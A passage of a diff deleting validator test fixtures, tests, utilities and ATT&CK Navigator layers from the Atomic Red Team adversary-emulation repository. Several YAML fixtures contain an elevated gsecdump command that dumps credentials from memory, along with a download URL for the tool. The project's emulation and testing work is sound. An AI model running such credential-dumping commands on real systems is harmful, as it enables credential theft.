atomic_red_team/test_data/reused_guid.yaml
-34
View File
@@ -1,34 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
elevation_required: true
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/string_pattern_mismatch.yaml
-13
View File
@@ -1,13 +0,0 @@
attack_technique: W1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
executor:
command: |
echo "ART"
name: command_prompt
atomic_red_team/test_data/string_too_short.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/unused_input_argument.yaml
-27
View File
@@ -1,27 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: path
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
gsecdump_bin_hash:
description: File hash of the Gsecdump binary file
type: string
default: 94CAE63DCBABB71C5DD43F55FD09CAEFFDCD7628A02A112FB3CBA36698EF72BC
gsecdump_url:
description: Path to download Gsecdump binary file
type: url
default: https://web.archive.org/web/20150606043951if_/http://www.truesec.se/Upload/Sakerhet/Tools/gsecdump-v2b5.exe
dependency_executor_name: powershell
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/test_data/url_parsing.yaml
-18
View File
@@ -1,18 +0,0 @@
attack_technique: T1003
display_name: OS Credential Dumping
atomic_tests:
- name: Gsecdump
auto_generated_guid: 0f7c5301-6859-45ba-8b4d-1fac30fc31ed
description: |
Dump credentials from memory using Gsecdump.
supported_platforms:
- windows
input_arguments:
gsecdump_exe:
description: Path to the Gsecdump executable
type: url
default: PathToAtomicsFolder\..\ExternalPayloads\gsecdump.exe
executor:
command: |
"#{gsecdump_exe}" -a
name: command_prompt
atomic_red_team/tests/__init__.py
View File
atomic_red_team/tests/test_models.py
-125
View File
@@ -1,125 +0,0 @@
from hypothesis import given, strategies as st, settings, HealthCheck
from hypothesis.provisional import urls
from pydantic import AnyUrl
from pydantic.networks import IPvAnyAddress
from atomic_red_team.models import (
Technique,
Atomic,
StringArg,
IntArg,
FloatArg,
UrlArg,
ManualExecutor,
Platform,
CommandExecutor,
ExecutorType,
)
executor_strategy = st.sampled_from(["powershell", "bash", "sh", "command_prompt"])
st.register_type_strategy(IPvAnyAddress, st.ip_addresses())
st.register_type_strategy(AnyUrl, urls())
alphanumeric_underscore_strategy = st.text(
alphabet=st.sampled_from(
"abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789_"
),
min_size=4,
)
input_args_types = [
st.builds(
StringArg,
description=st.text(),
default=st.text(),
type=st.sampled_from(["string", "path", "String", "Path"]),
),
st.builds(
IntArg,
description=st.text(),
default=st.integers(),
type=st.sampled_from(["integer", "Integer"]),
),
st.builds(
FloatArg,
description=st.text(),
default=st.floats(),
type=st.sampled_from(["float", "Float"]),
),
st.builds(
UrlArg,
description=st.text(),
default=st.one_of(urls(), st.ip_addresses()),
type=st.sampled_from(["url", "Url"]),
),
]
platforms_strategy = st.lists(st.sampled_from(list(Platform.__args__)), min_size=1)
input_arguments_strategy = st.dictionaries(
keys=alphanumeric_underscore_strategy, values=st.one_of(*input_args_types)
)
atomics_strategy = dict(
input_arguments=input_arguments_strategy,
name=alphanumeric_underscore_strategy,
description=st.text(min_size=5),
supported_platforms=platforms_strategy,
)
def atomic_manual_executor_builder():
def build_atomic(input_arguments, **kwargs):
formatted_args = " ".join(
[f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
)
return Atomic(
**kwargs,
executor=ManualExecutor(
name="manual", steps=f"{formatted_args} Custom steps here..."
),
input_arguments=input_arguments,
)
return st.builds(build_atomic, **atomics_strategy)
def atomic_command_executor_builder():
def build_atomic(input_arguments, executor_name, **kwargs):
formatted_args = " ".join(
[f"echo #{key}=#{{{key}}}" for key in input_arguments.keys()]
)
return Atomic(
executor=CommandExecutor(
name=executor_name,
command=f"{formatted_args} Custom steps here...",
elevation_required="sudo" in formatted_args,
),
input_arguments=input_arguments,
**kwargs,
)
return st.builds(build_atomic, executor_name=executor_strategy, **atomics_strategy)
@given(
st.builds(
Technique,
attack_technique=st.integers(min_value=1000, max_value=9999).map(
lambda x: f"T{x}"
),
atomic_tests=st.lists(
st.one_of(
atomic_manual_executor_builder(), atomic_command_executor_builder()
),
min_size=1,
),
)
)
@settings(max_examples=500, suppress_health_check=[HealthCheck.too_slow])
def test_property(instance):
assert isinstance(instance, Technique)
assert len(instance.attack_technique) > 4
assert len(instance.display_name) >= 5
for test in instance.atomic_tests:
assert isinstance(test, Atomic)
assert test.executor.name in ExecutorType.__args__
atomic_red_team/tests/test_validate.py
-20
View File
@@ -1,20 +0,0 @@
import os
from os.path import dirname, realpath
from pathlib import Path
import pytest
from pydantic import ValidationError
from atomic_red_team.validator import Validator
test_data_path = f"{dirname(dirname(realpath(__file__)))}/test_data"
@pytest.mark.parametrize("test_input", list(os.scandir(test_data_path)))
def test_all_invalid_scenarios(test_input):
validator = Validator()
with pytest.raises(ValidationError) as exc_info:
validator.validate(test_input)
error_types = [e["type"] for e in exc_info.value.errors()]
assert Path(test_input).stem in error_types
atomic_red_team/utils.py
-374
View File
@@ -1,374 +0,0 @@
"""
Atomic Red Team module for loading and managing atomic tests.
This module provides the AtomicRedTeam class that manages atomic tests,
generates documentation, and provides various utility functions.
Optimized for speed with caching and efficient data structures.
"""
import glob
import re
from concurrent.futures import ProcessPoolExecutor, as_completed
from functools import lru_cache
from pathlib import Path
from typing import Dict, List, Optional, Pattern, Tuple, Union
import yaml # PyYAML is faster than ruamel.yaml for loading
try:
from yaml import CSafeLoader as SafeLoader
except ImportError:
from yaml import SafeLoader
from jinja2 import Environment, FileSystemLoader
from atomic_red_team.attack_api import ATTACK_API
from atomic_red_team.common import atomics_path
ROOT_GITHUB_URL = "https://github.com/redcanaryco/atomic-red-team"
@lru_cache(maxsize=1)
def _get_jinja_env() -> Environment:
"""Get cached Jinja2 environment with custom filters."""
template_dir = Path(__file__).parent
env = Environment(
loader=FileSystemLoader(template_dir),
trim_blocks=True,
lstrip_blocks=True,
auto_reload=False, # Disable auto-reload for speed
)
# Add custom filters
env.filters["get_language"] = get_language
env.filters["cleanup"] = cleanup_for_markdown
env.filters["slugify"] = slugify
env.filters["platform_display"] = get_supported_platform_display
return env
@lru_cache(maxsize=1)
def _get_template():
"""Get cached compiled template."""
return _get_jinja_env().get_template("atomic_doc_template.md.j2")
def get_language(executor: str) -> str:
"""Convert executor name to language identifier for code blocks."""
if executor == "command_prompt":
return "cmd"
elif executor == "manual":
return ""
return executor
def get_supported_platform_display(platform: str) -> str:
"""Convert platform identifier to display name (matches Ruby behavior)."""
# Ruby just capitalizes the first letter, except for 'macos' -> 'macOS'
if platform == "macos":
return "macOS"
return platform.capitalize()
def cleanup_for_markdown(value) -> str:
"""Clean up a value for use in markdown tables."""
if value is None:
return ""
return str(value).strip().replace("\\", "&#92;")
# Pre-compiled regex for slugify
_SLUGIFY_PATTERN = re.compile(r"[`~!@#$%^&*()+=<>?,.\/:;\"'|{}\[\]\\–—]")
def slugify(title: str) -> str:
"""Convert a title to a URL-friendly slug."""
slug = title.lower().replace(" ", "-")
return _SLUGIFY_PATTERN.sub("", slug)
def _load_yaml_file(path: str) -> Optional[dict]:
"""Load a YAML file using fast PyYAML loader."""
try:
with open(path, "r", encoding="utf-8") as f:
return yaml.load(f, Loader=SafeLoader)
except Exception:
return None
class AtomicRedTeam:
"""
Main class for managing Atomic Red Team tests.
Provides methods for loading atomic tests, generating documentation,
and validating YAML files. Optimized for speed.
"""
def __init__(self, atomics_directory: Optional[str] = None):
"""
Initialize the AtomicRedTeam instance.
Args:
atomics_directory: Path to the atomics directory.
Defaults to the standard atomics path.
"""
self.atomics_directory = atomics_directory or atomics_path
self._atomic_tests: Optional[List[dict]] = None
self._atomic_tests_by_id: Optional[Dict[str, dict]] = None
self._only_platform: Pattern = re.compile(r".*")
@property
def only_platform(self) -> Pattern:
"""Get the current platform filter pattern."""
return self._only_platform
@only_platform.setter
def only_platform(self, pattern: Pattern):
"""Set the platform filter pattern."""
self._only_platform = pattern
@property
def atomic_test_paths(self) -> List[str]:
"""Returns a list of paths that contain Atomic Tests."""
pattern = f"{self.atomics_directory}/T*/T*.yaml"
return sorted(glob.glob(pattern))
@property
def atomic_tests(self) -> List[dict]:
"""
Returns a list of Atomic Tests in Atomic Red Team (as dicts from source YAML).
"""
if self._atomic_tests is not None:
return self._atomic_tests
self._atomic_tests = []
for path in self.atomic_test_paths:
atomic_yaml = _load_yaml_file(path)
if atomic_yaml:
atomic_yaml["atomic_yaml_path"] = path
self._atomic_tests.append(atomic_yaml)
return self._atomic_tests
def _get_atomic_by_id(self, technique_id: str) -> Optional[dict]:
"""Get atomic test by technique ID using cached index."""
if self._atomic_tests_by_id is None:
self._atomic_tests_by_id = {}
for test in self.atomic_tests:
tid = test.get("attack_technique", "").upper()
if tid:
self._atomic_tests_by_id[tid] = test
return self._atomic_tests_by_id.get(technique_id.upper())
def atomic_tests_for_technique(
self, technique_or_identifier: Union[str, dict]
) -> List[dict]:
"""
Returns the individual Atomic Tests for a given identifier.
Args:
technique_or_identifier: Either a technique ID string (e.g., "T1234")
or an ATT&CK technique object.
Returns:
List of atomic test dictionaries.
"""
if isinstance(technique_or_identifier, dict):
technique_identifier = ATTACK_API.technique_identifier_for_technique(
technique_or_identifier
)
else:
technique_identifier = technique_or_identifier
atomic_yaml = self._get_atomic_by_id(technique_identifier)
return atomic_yaml.get("atomic_tests", []) if atomic_yaml else []
def atomic_tests_for_technique_by_platform(
self, technique_or_identifier: Union[str, dict], platform: str
) -> List[dict]:
"""
Returns the individual Atomic Tests for a given identifier filtered by platform.
Args:
technique_or_identifier: Either a technique ID string (e.g., "T1234")
or an ATT&CK technique object.
platform: Platform to filter by (e.g., "windows", "linux", "macos").
Returns:
List of atomic test dictionaries matching the platform.
"""
tests = self.atomic_tests_for_technique(technique_or_identifier)
return [t for t in tests if platform in t.get("supported_platforms", [])]
def atomic_yaml_has_test_for_platform(
self, yaml_file: str, only_platform: Pattern
) -> bool:
"""
Check if a YAML file has tests for a given platform.
Args:
yaml_file: Path to the YAML file.
only_platform: Regex pattern to match platforms.
Returns:
True if the file has tests for the platform.
"""
yaml_path = Path(yaml_file)
if not yaml_path.exists():
return False
data = _load_yaml_file(str(yaml_path))
if not data or "atomic_tests" not in data:
return False
for atomic in data["atomic_tests"]:
for platform in atomic.get("supported_platforms", []):
if only_platform.match(platform.lower()):
return True
return False
def github_link_to_technique(
self,
technique: dict,
include_identifier: bool = False,
only_platform: Optional[Pattern] = None,
) -> str:
"""
Returns a Markdown formatted GitHub link to a technique.
This will be to the edit page for techniques that already have one or more
Atomic Red Team tests, or the create page for techniques that have no
existing tests for the given OS.
Args:
technique: ATT&CK technique dictionary.
include_identifier: Whether to include the technique ID in the link text.
only_platform: Platform pattern filter. Defaults to instance's only_platform.
Returns:
Markdown formatted link string.
"""
if only_platform is None:
only_platform = self._only_platform
technique_identifier = ATTACK_API.technique_identifier_for_technique(
technique
).upper()
# Use display_name from atomic YAML if available (has full name for sub-techniques)
atomic_yaml = self._get_atomic_by_id(technique_identifier)
if atomic_yaml:
technique_name = atomic_yaml.get("display_name", technique.get("name", ""))
else:
technique_name = technique.get("name", "")
link_display = technique_name
if include_identifier:
link_display = f"{technique_identifier} {technique_name}"
yaml_file = f"{self.atomics_directory}/{technique_identifier}/{technique_identifier}.yaml"
markdown_file = f"{self.atomics_directory}/{technique_identifier}/{technique_identifier}.md"
if (
self.atomic_yaml_has_test_for_platform(yaml_file, only_platform)
and Path(markdown_file).exists()
):
return f"[{link_display}](../../{technique_identifier}/{technique_identifier}.md)"
else:
return f"{link_display} [CONTRIBUTE A TEST](https://github.com/redcanaryco/atomic-red-team/wiki/Contributing)"
def generate_technique_docs(
self, technique_identifier: str, output_path: Optional[str] = None
) -> str:
"""
Generate Markdown documentation for a technique.
Args:
technique_identifier: The technique ID (e.g., "T1059").
output_path: Optional path to write the output. If None, returns the content.
Returns:
The generated Markdown content.
"""
technique_identifier = technique_identifier.upper()
# Find the atomic YAML using cached index
atomic_yaml = self._get_atomic_by_id(technique_identifier)
if not atomic_yaml:
raise ValueError(
f"No atomic tests found for technique {technique_identifier}"
)
# Get technique info from ATT&CK for description
technique_info = ATTACK_API.technique_info(technique_identifier)
technique = {
"identifier": technique_identifier,
"name": atomic_yaml.get("display_name", ""),
"description": technique_info.get("description", "") if technique_info else "",
}
# Render using cached template
template = _get_template()
content = template.render(
technique=technique,
atomic_yaml=atomic_yaml,
)
content = content.rstrip() + "\n"
if output_path:
Path(output_path).write_text(content, encoding="utf-8")
return content
def generate_all_docs(self, parallel: bool = True) -> Dict[str, str]:
"""
Generate documentation for all techniques.
Args:
parallel: Whether to use parallel processing.
Returns:
Dictionary mapping technique IDs to their generated documentation.
"""
docs = {}
technique_ids = [
test.get("attack_technique", "").upper()
for test in self.atomic_tests
if test.get("attack_technique")
]
if parallel:
# Use parallel processing
# Create a standalone function for ProcessPoolExecutor
def _generate_doc_worker(args: Tuple[str, str]) -> Tuple[str, str]:
technique_id, atomics_directory = args
from atomic_red_team.utils import AtomicRedTeam
art = AtomicRedTeam(atomics_directory=atomics_directory)
return (technique_id, art.generate_technique_docs(technique_id))
with ProcessPoolExecutor() as executor:
future_to_id = {
executor.submit(_generate_doc_worker, (tid, self.atomics_directory)): tid
for tid in technique_ids
}
for future in as_completed(future_to_id):
tid = future_to_id[future]
try:
docs[tid] = future.result()
except Exception as e:
print(f"Error generating docs for {tid}: {e}")
else:
# Sequential processing
for tid in technique_ids:
try:
docs[tid] = self.generate_technique_docs(tid)
except Exception as e:
print(f"Error generating docs for {tid}: {e}")
return docs
# Singleton instance for convenience
ATOMIC_RED_TEAM = AtomicRedTeam()
atomic_red_team/validator.py
-117
View File
@@ -1,117 +0,0 @@
import collections
import fnmatch
from os import DirEntry
from pydantic import ValidationError
from pydantic_core import InitErrorDetails, PydanticCustomError
from ruamel.yaml import YAML
from atomic_red_team.common import atomics_path
from atomic_red_team.models import Technique
yaml = YAML(typ="safe")
def format_validation_error(error: ValidationError):
if len(error.errors()) == 1:
err = error.errors()[0]
message = ""
if err["type"] == "elevation_required_but_not_provided":
return {err["msg"]: list(err.get("loc")) + err.get("ctx").get("loc")}
if err["input"] and err["type"] != "unused_input_argument":
message += f"{err['input']} - "
return {message + err["msg"]: err.get("loc")}
inputs = collections.defaultdict(set)
for e in error.errors():
if e["type"] == "elevation_required_but_not_provided":
return {e["msg"]: e.get("loc") + e.get("ctx").get("loc")}
# If it's a union type, then it generates multiple errors for the same input arguments.
# Here we collect only the common paths. For example,
# [( input_arguments, url_parsing),(input_arguments, string_mismatch)] => (input_arguments)
if len(inputs[e["input"]]) == 0:
inputs[e["input"]] = e.get("loc", tuple())
else:
inputs[e["input"]] = tuple(
[x for x in inputs[e["input"]] if x in e.get("loc", tuple())]
)
return dict(inputs)
class Validator:
def __init__(self):
used_guids_path = f"{atomics_path}/used_guids.txt"
with open(used_guids_path, "r") as f:
self.used_guids = [x.strip() for x in f.readlines()]
self.guids = []
def validate(self, obj: DirEntry):
if obj.is_file():
if fnmatch.fnmatch(obj.name, "*.y*ml"):
self.validate_file(obj)
if obj.is_dir():
self.validate_directory(obj)
def validate_file(self, file: DirEntry):
"""Performs file validation"""
self.validate_yaml_extension(file)
self.validate_atomic(file)
def validate_atomic(self, file: DirEntry):
"""Validates whether the defined input args are used."""
with open(file.path, "r") as f:
atomic = yaml.load(f)
technique = Technique(**atomic)
for index, t in enumerate(technique.atomic_tests):
if t.auto_generated_guid:
if t.auto_generated_guid not in self.guids:
self.guids.append(t.auto_generated_guid)
else:
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"reused_guid",
f"GUID {t.auto_generated_guid} reused for test {t.name}. GUIDs are auto generated. You can remove atomic_tests[{index}].auto_generated_guid",
),
loc=("atomic_tests", index, "auto_generated_guid"),
input=t.auto_generated_guid,
)
],
)
def validate_yaml_extension(self, file: DirEntry):
"""Validates the yaml extension"""
if fnmatch.fnmatch(file.path, "*.yml"):
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"invalid_filename",
"Rename file from .yml to .yaml",
),
loc=["filename"],
)
],
)
def validate_directory(self, directory: DirEntry):
"""Performs directory validation"""
self.validate_directory_path(directory)
def validate_directory_path(self, directory: DirEntry):
"""Validated whether the directory is allowed directory name (`src` or `bin`)"""
if directory.name not in ["src", "bin"]:
raise ValidationError.from_exception_data(
"ValueError",
[
InitErrorDetails(
type=PydanticCustomError(
"invalid_directory",
"Invalid path. `src` and `bin` are the only two directories supported.",
),
loc=["directory"],
)
],
)
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-azure-ad.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Azure-AD)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Azure-AD) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1082","score":1,"enabled":true,"comment":"\n- Azure Security Scan with SkyArk\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1082/T1082.md"}]},{"techniqueID":"T1098","score":7,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- Azure AD - adding user to Azure AD role\n- Azure AD - adding service principal to Azure AD role\n- Azure AD - adding permission to application\n"},{"techniqueID":"T1098.001","score":2,"enabled":true,"comment":"\n- Azure AD Application Hijacking - Service Principal\n- Azure AD Application Hijacking - App Registration\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1098.003","score":2,"enabled":true,"comment":"\n- Azure AD - Add Company Administrator Role to a user\n- Simulate - Post BEC persistence via user password reset followed by user added to company administrator role\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.003/T1098.003.md"}]},{"techniqueID":"T1110","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.001","score":1,"enabled":true,"comment":"\n- Brute Force Credentials of single Azure AD user\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.001/T1110.001.md"}]},{"techniqueID":"T1110.003","score":2,"enabled":true,"comment":"\n- Password spray all Azure AD users with a single password\n- Password Spray Microsoft Online Accounts with MSOLSpray (Azure/O365)\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.003","score":2,"enabled":true,"comment":"\n- Azure AD - Create a new user\n- Azure AD - Create a new user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.003/T1136.003.md"}]},{"techniqueID":"T1484","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484/T1484.md"}]},{"techniqueID":"T1484.002","score":1,"enabled":true,"comment":"\n- Add Federation to Azure AD\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1484.002/T1484.002.md"}]},{"techniqueID":"T1531","score":2,"enabled":true,"comment":"\n- Azure AD - Delete user via Azure AD PowerShell\n- Azure AD - Delete user via Azure CLI\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1531/T1531.md"}]},{"techniqueID":"T1552","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.005","score":1,"enabled":true,"comment":"\n- Azure - Search Azure AD User Attributes for Passwords\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.005/T1552.005.md"}]},{"techniqueID":"T1606","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606/T1606.md"}]},{"techniqueID":"T1606.002","score":1,"enabled":true,"comment":"\n- Golden SAML\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1606.002/T1606.002.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-containers.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Containers)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Containers) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1046","score":1,"enabled":true,"comment":"\n- Network Service Discovery for Containers\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1046/T1046.md"}]},{"techniqueID":"T1053","score":3,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053/T1053.md"}]},{"techniqueID":"T1053.002","score":1,"enabled":true,"comment":"\n- At - Schedule a job via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.002/T1053.002.md"}]},{"techniqueID":"T1053.007","score":2,"enabled":true,"comment":"\n- ListCronjobs\n- CreateCronjob\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1053.007/T1053.007.md"}]},{"techniqueID":"T1069","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069/T1069.md"}]},{"techniqueID":"T1069.001","score":1,"enabled":true,"comment":"\n- Permission Groups Discovery for Containers- Local Groups\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1069.001/T1069.001.md"}]},{"techniqueID":"T1105","score":1,"enabled":true,"comment":"\n- Curl Insecure Connection from a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1105/T1105.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136/T1136.md"}]},{"techniqueID":"T1136.001","score":1,"enabled":true,"comment":"\n- Create a Linux user via kubectl in a Pod\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1136.001/T1136.001.md"}]},{"techniqueID":"T1195","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195/T1195.md"}]},{"techniqueID":"T1195.002","score":1,"enabled":true,"comment":"\n- Simulate npm package installation on a Linux system\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1195.002/T1195.002.md"}]},{"techniqueID":"T1552","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552/T1552.md"}]},{"techniqueID":"T1552.007","score":2,"enabled":true,"comment":"\n- List All Secrets\n- ListSecrets\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1552.007/T1552.007.md"}]},{"techniqueID":"T1609","score":2,"enabled":true,"comment":"\n- ExecIntoContainer\n- Docker Exec Into Container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1609/T1609.md"}]},{"techniqueID":"T1610","score":1,"enabled":true,"comment":"\n- Deploy Docker container\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1610/T1610.md"}]},{"techniqueID":"T1611","score":3,"enabled":true,"comment":"\n- Deploy container using nsenter container escape\n- Mount host filesystem to escape privileged Docker container\n- Privilege Escalation via Docker Volume Mapping\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1611/T1611.md"}]},{"techniqueID":"T1612","score":1,"enabled":true,"comment":"\n- Build Image On Host\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1612/T1612.md"}]},{"techniqueID":"T1613","score":2,"enabled":true,"comment":"\n- Docker Container and Resource Discovery\n- Podman Container and Resource Discovery\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1613/T1613.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-esxi.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (ESXi)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (ESXi) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-google-workspace.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Google-Workspace)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Google-Workspace) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1078","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078/T1078.md"}]},{"techniqueID":"T1078.004","score":1,"enabled":true,"comment":"\n- Creating GCP Service Account and Service Account Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1078.004/T1078.004.md"}]}]}
atomics/Indexes/Attack-Navigator-Layers/art-navigator-layer-iaas-aws.json
-1
View File
@@ -1 +0,0 @@
{"name":"Atomic Red Team (Iaas:AWS)","versions":{"attack":"16","navigator":"5.1.0","layer":"4.5"},"description":"Atomic Red Team (Iaas:AWS) MITRE ATT&CK Navigator Layer","domain":"enterprise-attack","filters":{},"gradient":{"colors":["#ffffff","#ce232e"],"minValue":0,"maxValue":10},"legendItems":[{"label":"10 or more tests","color":"#ce232e"},{"label":"1 or more tests","color":"#ffffff"}],"techniques":[{"techniqueID":"T1098","score":2,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098/T1098.md"}],"comment":"\n- AWS - Create a group and add a user to that group\n"},{"techniqueID":"T1098.001","score":1,"enabled":true,"comment":"\n- AWS - Create Access Key and Secret Key\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1098.001/T1098.001.md"}]},{"techniqueID":"T1110","score":1,"enabled":true,"links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110/T1110.md"}]},{"techniqueID":"T1110.003","score":1,"enabled":true,"comment":"\n- AWS - Password Spray an AWS using GoAWSConsoleSpray\n","links":[{"label":"View Atomic","url":"https://github.com/redcanaryco/atomic-red-team/blob/master/atomics/T1110.003/T1110.003.md"}]},{"techniqueID":"T1136","score":1,"enabled":true,"links":[{"label":"View 